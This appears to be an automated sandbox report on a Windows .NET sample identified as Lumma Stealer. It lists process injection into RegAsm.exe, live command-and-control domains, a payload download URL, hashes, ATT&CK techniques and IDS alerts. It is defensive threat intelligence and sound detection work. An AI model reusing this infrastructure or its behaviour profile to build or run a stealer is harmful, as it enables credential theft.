    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: traineiwnqo.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: locatedblsoqp.shop
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.000000000283A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: miracledzmnqwui.shop
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C2A008
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
    MITRE ATT&CK Matrix (signature counts in parentheses)

    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (311) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Clipboard Data (2) | Ingress Tool Transfer (11) | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | PowerShell (1) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (311) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (124) | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (11) | LSA Secrets | System Information Discovery (22) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (31) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Timestomp (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    Source | Detection | Scanner | Label | Link
    SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe | 100% | Joe Sandbox ML | |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Source | Detection | Scanner | Label | Link
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
    http://147.45.44.131/files/u888.exe | 0% | Avira URL Cloud | safe |
    miracledzmnqwui.shop | 100% | Avira URL Cloud | phishing |
    stamppreewntnq.shop | 100% | Avira URL Cloud | phishing |
    evoliutwoqm.shop | 0% | Avira URL Cloud | safe |
    https://traineiwnqo.shop/.% | 100% | Avira URL Cloud | malware |
    condedqpwqm.shop | 100% | Avira URL Cloud | phishing |
    https://traineiwnqo.shop/apim | 100% | Avira URL Cloud | malware |
    https://locatedblsoqp.shop/api | 100% | Avira URL Cloud | malware |
    https://traineiwnqo.shop/api | 100% | Avira URL Cloud | malware |
    https://traineiwnqo.shop/&% | 100% | Avira URL Cloud | malware |
    locatedblsoqp.shop | 100% | Avira URL Cloud | phishing |
    millyscroqwp.shop | 100% | Avira URL Cloud | malware |
    http://147.45.44.131/files/u888.exeP | 0% | Avira URL Cloud | safe |
    https://miracledzmnqwui.shop/api | 100% | Avira URL Cloud | malware |
    caffegclasiqwp.shop | 100% | Avira URL Cloud | malware |
    https://traineiwnqo.shop/ | 100% | Avira URL Cloud | malware |
    http://147.45.44.131 | 0% | Avira URL Cloud | safe |
    stagedchheiqwo.shop | 100% | Avira URL Cloud | phishing |
    traineiwnqo.shop | 100% | Avira URL Cloud | malware |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    miracledzmnqwui.shop | 188.114.96.3 | true | true | | unknown
    locatedblsoqp.shop | 188.114.97.3 | true | true | | unknown
    traineiwnqo.shop | 188.114.97.3 | true | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://locatedblsoqp.shop/api | true | Avira URL Cloud: malware | unknown
    miracledzmnqwui.shop | true | Avira URL Cloud: phishing | unknown
    https://traineiwnqo.shop/api | true | Avira URL Cloud: malware | unknown
    condedqpwqm.shop | true | Avira URL Cloud: phishing | unknown
    stamppreewntnq.shop | true | Avira URL Cloud: phishing | unknown
    evoliutwoqm.shop | true | Avira URL Cloud: safe | unknown
    http://147.45.44.131/files/u888.exe | false | Avira URL Cloud: safe | unknown
    locatedblsoqp.shop | true | Avira URL Cloud: phishing | unknown
    caffegclasiqwp.shop | true | Avira URL Cloud: malware | unknown
    https://miracledzmnqwui.shop/api | true | Avira URL Cloud: malware | unknown
    millyscroqwp.shop | true | Avira URL Cloud: malware | unknown
    stagedchheiqwo.shop | true | Avira URL Cloud: phishing | unknown
    traineiwnqo.shop | true | Avira URL Cloud: malware | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://traineiwnqo.shop/.% | RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://traineiwnqo.shop/&% | RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://traineiwnqo.shop/apim | RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://147.45.44.131/files/u888.exeP | SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://traineiwnqo.shop/ | RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    147.45.44.131 | unknown | Russian Federation | 2895 | FREE-NET-AS FREEnet EU | false
    188.114.97.3 | locatedblsoqp.shop | European Union | 13335 | CLOUDFLARENET US | true
    188.114.96.3 | miracledzmnqwui.shop | European Union | 13335 | CLOUDFLARENET US | true
    Joe Sandbox version: 40.0.0 Tourmaline
    Analysis ID: 1500506
    Start date and time: 2024-08-28 15:28:07 +02:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 4m 40s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed: 21
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Detection: MAL
    Classification: mal100.troj.evad.winEXE@5/1@3/3
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 24
    • Number of non-executed functions: 47
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
    • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed; the report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    • VT rate limit hit for: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Time | Type | Description
    09:29:02 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe modified
    09:29:06 | API Interceptor | 2x Sleep call for process: RegAsm.exe modified
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.22811.18368.exe | malicious | LummaC | 147.45.44.131/files/Wpm.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.22463.10190.exe | malicious | LummaC | 147.45.44.131/files/6656.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.16891.19765.exe | malicious | LummaC | 147.45.44.131/files/Wpm2.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.11380.16691.exe | malicious | LummaC | 147.45.44.131/files/421.exe
    147.45.44.131 | Selenium.exe | malicious | LummaC | 147.45.44.131/files/i999.exe
    147.45.44.131 | RunPE.exe | malicious | LummaC | 147.45.44.131/files/WWW.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.9325.13976.exe | malicious | LummaC | 147.45.44.131/files/r57.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe | malicious | LummaC | 147.45.44.131/files/pp.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exe | malicious | LummaC | 147.45.44.131/files/98.exe
    147.45.44.131 | SecuriteInfo.com.Trojan.InjectNET.17.26904.26035.exe | malicious | LummaC | 147.45.44.131/files/98.exe
    188.114.97.3 | file.exe | malicious | LummaC | joxi.net/4Ak49WQH0GE3Nr.mp3
    188.114.97.3 | Rudvfa0Z17.exe | malicious | Nitol | web.ad87h92j.com/4/t.bmp
    188.114.97.3 | nOyswc9ly2.dll | malicious | Unknown | web.ad87h92j.com/4/t.bmp
    188.114.97.3 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/0U9QqTZ6/download
    188.114.97.3 | QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | filetransfer.io/data-package/e0pM9Trc/download
    188.114.97.3 | steam_module_x64.exe | malicious | DCRat, PureLog Stealer, zgRAT | 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
    188.114.97.3 | http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jsp | malicious | Unknown | membership.garenaa.id.vn/user/login/images/fb_ico.png
    188.114.97.3 | Bonelessness.exe | malicious | Simda Stealer | lysyvan.com/login.php
    188.114.97.3 | 700987654656676.exe | malicious | DBatLoader, FormBook | www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
    188.114.97.3 | PI#220824.exe | malicious | FormBook | www.bbyul.shop/1i58/
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    traineiwnqo.shop | satellites.exe | malicious | LummaC | 188.114.96.3
    traineiwnqo.shop | satellites.exe | malicious | LummaC | 188.114.96.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Vidar | 188.114.96.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
    traineiwnqo.shop | file.exe | malicious | LummaC, Vidar | 188.114.97.3
    locatedblsoqp.shop | pcsx2-v2.0.2-windows.exe | malicious | LummaC | 188.114.97.3
    locatedblsoqp.shop | CcPVItZy6w.exe | malicious | LummaC | 188.114.97.3
    locatedblsoqp.shop | CcPVItZy6w.exe | malicious | LummaC | 188.114.97.3
    locatedblsoqp.shop | file.exe | malicious | LummaC | 188.114.96.3
    locatedblsoqp.shop | Setup_v1.43.exe | malicious | LummaC | 188.114.96.3
    locatedblsoqp.shop | egaAfKJAg6.exe | malicious | LummaC | 188.114.96.3
    locatedblsoqp.shop | 3E4lHODAzI.exe | malicious | LummaC | 188.114.97.3
    locatedblsoqp.shop | XM7drU6O3G.exe | malicious | LummaC | 188.114.96.3
    locatedblsoqp.shop | file.exe | malicious | LummaC | 188.114.97.3
    locatedblsoqp.shop | Setup.exe | malicious | LummaC | 188.114.97.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.22811.18368.exe | malicious | LummaC | 188.114.96.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.22463.10190.exe | malicious | LummaC | 188.114.96.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.16891.19765.exe | malicious | LummaC | 188.114.96.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.11380.16691.exe | malicious | LummaC | 188.114.97.3
    miracledzmnqwui.shop | Selenium.exe | malicious | LummaC | 188.114.96.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.9325.13976.exe | malicious | LummaC | 188.114.96.3
    miracledzmnqwui.shop | SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe | malicious | LummaC | 188.114.97.3
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    CLOUDFLARENET US | https://google.mg/url?hl=en&q=https://google.nr/url?q=Gl7qws6TcZ&rct=4214&sa=t&esrc=vax&source=Gl7qws6TcZ&cd=Nzpn8b&cad=Gl7qws6TcZD5&ved=Gl7qws6TcZ84214G&uact=82299&url=amp%2Fgoogle.com.pg/amp/cli.re/rp5Y1r#YW5kcmV3QGhlZWRkaWdpdGFsbWVkaWEuY29t%2F&opi=256371986142&usg=lxfGUQNysmkDx&source=gmail&ust=5108318229914681&usg=AOGl7qws6TcZjng81rOWFwZGl7qws6TcZqR81 | malicious | HTMLPhisher | 104.26.15.4
    CLOUDFLARENET US | mmclaughlin-In Service Agreement-41918.pdf | malicious | HTMLPhisher | 104.17.25.14
    CLOUDFLARENET US | mbda-us.comAudiowav012.html | malicious | HTMLPhisher | 188.114.96.3
    CLOUDFLARENET US | https://berajpaints.com.pk/tag/dolor/ | malicious | Unknown | 104.17.25.14
    CLOUDFLARENET US | http://jop2024.sciencesconf.org/ | malicious | Unknown | 104.17.249.203
    CLOUDFLARENET US | file.exe | malicious | Unknown | 172.64.41.3
    CLOUDFLARENET US | mbda-us.comAudiowav012.html | malicious | HTMLPhisher | 104.17.25.14
    CLOUDFLARENET US | Proforma.Invoice.Payment.$$.html | malicious | Unknown | 104.17.25.14
    CLOUDFLARENET US | https://hattenforlag.se | malicious | Unknown | 104.18.95.41
    CLOUDFLARENET US | eicar-adobe-acrobat-attachment.pdf | malicious | EICAR | 172.64.41.3
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | Stealc, Vidar | 147.45.47.253
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Stealc, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | RedLine | 147.45.47.251
    FREE-NET-AS FREEnet EU | file.exe | malicious | Unknown | 147.45.44.168
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Stealc, Vidar | 147.45.68.138
    FREE-NET-AS FREEnet EU | file.exe | malicious | LummaC, Vidar | 147.45.68.138
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    a0e9f5d64349fb13191bc781f81f42e1 | pcsx2-v2.0.2-windows.exe | malicious | LummaC | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | qbvytVOPN0.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | CcPVItZy6w.exe | malicious | LummaC | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | 709876765465.exe | malicious | DBatLoader, FormBook | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | f8Y5y07yHi.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | qbvytVOPN0.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | kUL53PJUsV.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | CcPVItZy6w.exe | malicious | LummaC | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | satellites.exe | malicious | LummaC | 188.114.97.3, 188.114.96.3
    a0e9f5d64349fb13191bc781f81f42e1 | satellites.exe | malicious | LummaC | 188.114.97.3, 188.114.96.3
          No context
    Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    File Type: CSV text
    Category: dropped
    Size (bytes): 847
    Entropy (8bit): 5.345615485833535
    Encrypted: false
    SSDEEP: 24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
    MD5: EEEC189088CC5F1F69CEE62A3BE59EA2
    SHA1: 250F25CE24458FC0C581FDDF59FAA26D557844C5
    SHA-256: 5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
    SHA-512: 2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
    Malicious: true
    Reputation: moderate, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
    File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Entropy (8bit): 5.220628643177381
    TrID:
    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    • Win32 Executable (generic) a (10002005/4) 49.78%
    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
    • Generic Win/DOS Executable (2004/3) 0.01%
    • DOS Executable Generic (2002/1) 0.01%
    File name: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    File size: 14'336 bytes
    MD5: 876c12019e3b15fe92841e8d358d4921
    SHA1: 08e3fb4496270b4ab04d5adee71fefdb670114a1
    SHA256: b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
    SHA512: ad35ea067bcb51cd420404136f62a66698f8d10e2b46ea6c13161f0e14b9558233ccae05e5ba1f175d4f71be55dbc960df8663abf5012ce1a12e462dbd766e6e
    SSDEEP: 384:EDtTXkmazUdOsR9VxeFpFb+iQIQRJqj5MqaCFJV9/y:Eh7/6Uad1QHqlT6
    TLSH: 0C523C5C1BD8443AFEAA1EBDA8E343018A73F76E5503F72F1C9C50992D8276055F136A
    File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."..........."...0..............L... ...`....@.. ....................................`................................
    Icon Hash: 00928e8e8686b000
    Entrypoint: 0x404cc6
    Entrypoint Section: .text
    Digitally signed: false
    Imagebase: 0x400000
    Subsystem: windows gui
    Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Time Stamp: 0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major: 4
    OS Version Minor: 0
    File Version Major: 4
    File Version Minor: 0
    Subsystem Version Major: 4
    Subsystem Version Minor: 0
    Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4c71 | 0x4f | .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x5cc | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4bd0 | 0x38 | .text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x2000 | 0x2ccc | 0x2e00 | d77976d9a9d7b43cef3d736362c29b48 | False | 0.47469429347826086 | data | 5.514309655715098 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rsrc | 0x6000 | 0x5cc | 0x600 | fea80c03178fc0dd78c3b4db1f09a417 | False | 0.4192708333333333 | data | 4.117373895955984 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc | 0x8000 | 0xc | 0x200 | 658905ad537379efc9d674fdc42ca684 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
    RT_VERSION | 0x6090 | 0x33c | data | | | 0.4190821256038647
    RT_MANIFEST | 0x63dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

    DLL | Import
    mscoree.dll | _CorExeMain
    Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
    2024-08-28T15:29:04.443508+0200 | TCP | 2055378 | ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) | 1 | 49703 | 443 | 192.168.2.7 | 188.114.96.3
    2024-08-28T15:29:06.451728+0200 | UDP | 2055483 | ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) | 1 | 50347 | 53 | 192.168.2.7 | 1.1.1.1
    2024-08-28T15:29:03.784058+0200 | UDP | 2055377 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) | 1 | 57265 | 53 | 192.168.2.7 | 1.1.1.1
    2024-08-28T15:29:05.247507+0200 | TCP | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 49703 | 443 | 192.168.2.7 | 188.114.96.3
    2024-08-28T15:29:05.247507+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 49703 | 443 | 192.168.2.7 | 188.114.96.3
    2024-08-28T15:29:05.751380+0200 | TCP | 2055489 | ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) | 1 | 49704 | 443 | 192.168.2.7 | 188.114.97.3
    2024-08-28T15:29:06.199789+0200 | TCP | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 49704 | 443 | 192.168.2.7 | 188.114.97.3
    2024-08-28T15:29:06.199789+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 49704 | 443 | 192.168.2.7 | 188.114.97.3
    2024-08-28T15:29:07.638515+0200 | TCP | 2055493 | ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) | 1 | 49707 | 443 | 192.168.2.7 | 188.114.97.3
    2024-08-28T15:29:07.105801+0200 | TCP | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 49705 | 443 | 192.168.2.7 | 188.114.97.3
    2024-08-28T15:29:07.105801+0200 | TCP | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 49705 | 443 | 192.168.2.7 | 188.114.97.3
